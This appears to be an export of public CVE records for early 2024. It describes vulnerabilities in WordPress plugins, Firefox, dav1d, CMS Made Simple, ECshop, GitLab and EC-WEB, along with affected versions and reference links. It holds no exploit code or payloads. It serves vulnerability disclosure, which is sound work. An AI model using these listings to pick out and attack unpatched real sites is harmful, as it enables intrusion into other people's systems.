CVE    2024    1585    Candidate    The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/metform/trunk/utils/util.php#L555   |   URL:https://plugins.trac.wordpress.org/browser/metform/trunk/utils/util.php#L555   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/metform/tags/3.8.3&old=3047398&new_path=/metform/tags/3.8.4&new=3047398&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/metform/tags/3.8.3&old=3047398&new_path=/metform/tags/3.8.4&new=3047398&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/342d6941-6987-4756-b554-1699128b9108?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/342d6941-6987-4756-b554-1699128b9108?source=cve    Assigned (20240216)
CVE    2024    1582    Candidate    The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgmza' shortcode in all versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3045434/wp-google-maps/trunk/includes/class.shortcodes.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045434/wp-google-maps/trunk/includes/class.shortcodes.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve    Assigned (20240216)
CVE    2024    1580    Candidate    An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading past version 1.4.0 of dav1d.    CONFIRM:https://support.apple.com/kb/HT214093   |   CONFIRM:https://support.apple.com/kb/HT214094   |   CONFIRM:https://support.apple.com/kb/HT214095   |   CONFIRM:https://support.apple.com/kb/HT214096   |   CONFIRM:https://support.apple.com/kb/HT214097   |   CONFIRM:https://support.apple.com/kb/HT214098   |   FEDORA:FEDORA-2024-12fcc689ac   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5EPMUNDMEBGESOJ2ZNCWYEAYOOEKNWOO/   |   MISC:https://code.videolan.org/videolan/dav1d/-/blob/master/NEWS   |   URL:https://code.videolan.org/videolan/dav1d/-/blob/master/NEWS   |   MISC:https://code.videolan.org/videolan/dav1d/-/releases/1.4.0   |   URL:https://code.videolan.org/videolan/dav1d/-/releases/1.4.0    Assigned (20240216)
CVE    2024    1570    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's login-password shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/LoginFormBuilder.php#L99   |   URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/LoginFormBuilder.php#L99   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve    Assigned (20240215)
CVE    2024    1568    Candidate    The Seraphinite Accelerator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.20.52 via the OnAdminApi_HtmlCheck function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.    MISC:https://plugins.trac.wordpress.org/changeset/3040707/seraphinite-accelerator   |   URL:https://plugins.trac.wordpress.org/changeset/3040707/seraphinite-accelerator   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/07287a85-df00-408a-8b02-978fd3116155?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/07287a85-df00-408a-8b02-978fd3116155?source=cve    Assigned (20240215)
CVE    2024    1566    Candidate    The Redirects plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to change redirects created with this plugin. This could lead to undesired redirection to phishing sites or malicious web pages.    MISC:https://plugins.trac.wordpress.org/browser/redirects/trunk/index.php#L118   |   URL:https://plugins.trac.wordpress.org/browser/redirects/trunk/index.php#L118   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve    Assigned (20240215)
CVE    2024    1564    Candidate    The wp-schema-pro WordPress plugin before 2.7.16 does not validate post access, allowing a contributor user to access custom fields on any post regardless of post type or status via a shortcode.    MISC:https://wpscan.com/vulnerability/ecb1e36f-9c6e-4754-8878-03c97194644d/   |   URL:https://wpscan.com/vulnerability/ecb1e36f-9c6e-4754-8878-03c97194644d/    Assigned (20240215)
CVE    2024    1563    Candidate    An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme and a timeout race condition. This vulnerability affects Focus for iOS < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863831   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863831   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-09/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-09/    Assigned (20240215)
CVE    2024    1562    Candidate    The WooCommerce Google Sheet Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the execute_post_data function in all versions up to, and including, 1.3.11. This makes it possible for unauthenticated attackers to update plugin settings.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve    Assigned (20240215)
CVE    2024    1559    Candidate    The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'll_reciprocal' parameter in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve    Assigned (20240215)
CVE    2024    1557    Candidate    Memory safety bugs present in Firefox 122. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 123.    MISC:Memory safety bugs fixed in Firefox 123   |   URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1746471%2C1848829%2C1864011%2C1869175%2C1869455%2C1869938%2C1871606   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/    Assigned (20240215)
CVE    2024    1556    Candidate    The incorrect object was checked for NULL in the built-in profiler, potentially leading to invalid memory access and undefined behavior. *Note:* This issue only affects the application when the profiler is running. This vulnerability affects Firefox < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1870414   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1870414   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/    Assigned (20240215)
CVE    2024    1555    Candidate    When opening a website using the `firefox://` protocol handler, SameSite cookies were not properly respected. This vulnerability affects Firefox < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1873223   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1873223   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/    Assigned (20240215)
CVE    2024    1554    Candidate    The `fetch()` API and navigation incorrectly shared the same cache, as the cache key did not include the optional headers `fetch()` may contain. Under the correct circumstances, an attacker may have been able to poison the local browser cache by priming it with a `fetch()` response controlled by the additional headers. Upon navigation to the same URL, the user would see the cached response instead of the expected response. This vulnerability affects Firefox < 123.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1816390   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1816390   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/    Assigned (20240215)
CVE    2024    1553    Candidate    Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8   |   URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1855686%2C1867982%2C1871498%2C1872296%2C1873521%2C1873577%2C1873597%2C1873866%2C1874080%2C1874740%2C1875795%2C1875906%2C1876425%2C1878211%2C1878286   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1552    Candidate    Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior. *Note:* This issue only affects 32-bit ARM devices. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1874502   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1874502   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1551    Candidate    Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1864385   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1864385   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1550    Candidate    A malicious website could have used a combination of exiting fullscreen mode and `requestPointerLock` to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860065   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860065   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1549    Candidate    If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1833814   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1833814   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1548    Candidate    A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1832627   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1832627   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1547    Candidate    Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown). This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1877879   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1877879   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1546    Candidate    When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1843752   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1843752   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-05/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-06/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-07/   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html   |   MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html    Assigned (20240215)
CVE    2024    1541    Candidate    The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.2.21/includes/blocks/class-kadence-blocks-advanced-heading-block.php#L418   |   URL:https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.2.21/includes/blocks/class-kadence-blocks-advanced-heading-block.php#L418   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0913632-85c5-4835-b606-4eca51df2496?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0913632-85c5-4835-b606-4eca51df2496?source=cve    Assigned (20240215)
CVE    2024    1538    Candidate    The File Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.4. This is due to missing or incorrect nonce validation on the wp_file_manager page that includes files through the 'lang' parameter. This makes it possible for unauthenticated attackers to include local JavaScript files that can be leveraged to achieve RCE via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This issue was partially patched in version 7.2.4, and fully patched in 7.2.5.    MISC:https://plugins.trac.wordpress.org/changeset/3051451/wp-file-manager   |   URL:https://plugins.trac.wordpress.org/changeset/3051451/wp-file-manager   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve    Assigned (20240215)
CVE    2024    1537    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Data_Table.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Data_Table.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve    Assigned (20240215)
CVE    2024    1536    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Event_Calendar.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Event_Calendar.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve    Assigned (20240215)
CVE    2024    1535    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L952   |   URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L952   |   MISC:https://plugins.trac.wordpress.org/changeset/3047008/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php   |   URL:https://plugins.trac.wordpress.org/changeset/3047008/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve    Assigned (20240215)
CVE    2024    1534    Candidate    The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve    Assigned (20240215)
CVE    2024    1530    Candidate    A vulnerability, which was classified as critical, has been found in ECshop 4.1.8. Affected by this issue is some unknown functionality of the file /admin/view_sendlist.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250562 is the identifier assigned to this vulnerability.    MISC:https://github.com/curlyyyyyyyy/ecshop/blob/main/README.md   |   URL:https://github.com/curlyyyyyyyy/ecshop/blob/main/README.md   |   MISC:https://vuldb.com/?ctiid.250562   |   URL:https://vuldb.com/?ctiid.250562   |   MISC:https://vuldb.com/?id.250562   |   URL:https://vuldb.com/?id.250562    Assigned (20240215)
CVE    2024    1529    Candidate    Vulnerability in CMS Made Simple 2.2.14, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/adduser.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially take over their browser session.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple    Assigned (20240215)
CVE    2024    1528    Candidate    CMS Made Simple version 2.2.14 does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/moduleinterface.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially hijack their browser session.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple    Assigned (20240215)
CVE    2024    1527    Candidate    Unrestricted file upload vulnerability in CMS Made Simple, affecting version 2.2.14. This vulnerability allows an authenticated user to bypass the security measures of the upload functionality and potentially create a remote execution of commands via webshell.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple    Assigned (20240215)
CVE    2024    1525    Candidate    An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.1 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Under some specialized conditions, an LDAP user may be able to reset their password using their verified secondary email address and sign-in using direct authentication with the reset password, bypassing LDAP.    MISC:GitLab Issue #438144   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/438144    Assigned (20240215)
CVE    2024    1523    Candidate    EC-WEB FS-EZViewer(Web)'s query functionality lacks proper restrictions on user input, allowing remote attackers authenticated as a regular user to inject SQL commands for reading, modifying, and deleting database records, as well as executing system commands. Attackers may even leverage the dbo privilege in the database for privilege escalation, elevating their privileges to administrator.    MISC:https://www.twcert.org.tw/tw/cp-132-7672-7eeac-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7672-7eeac-1.html    Assigned (20240215)
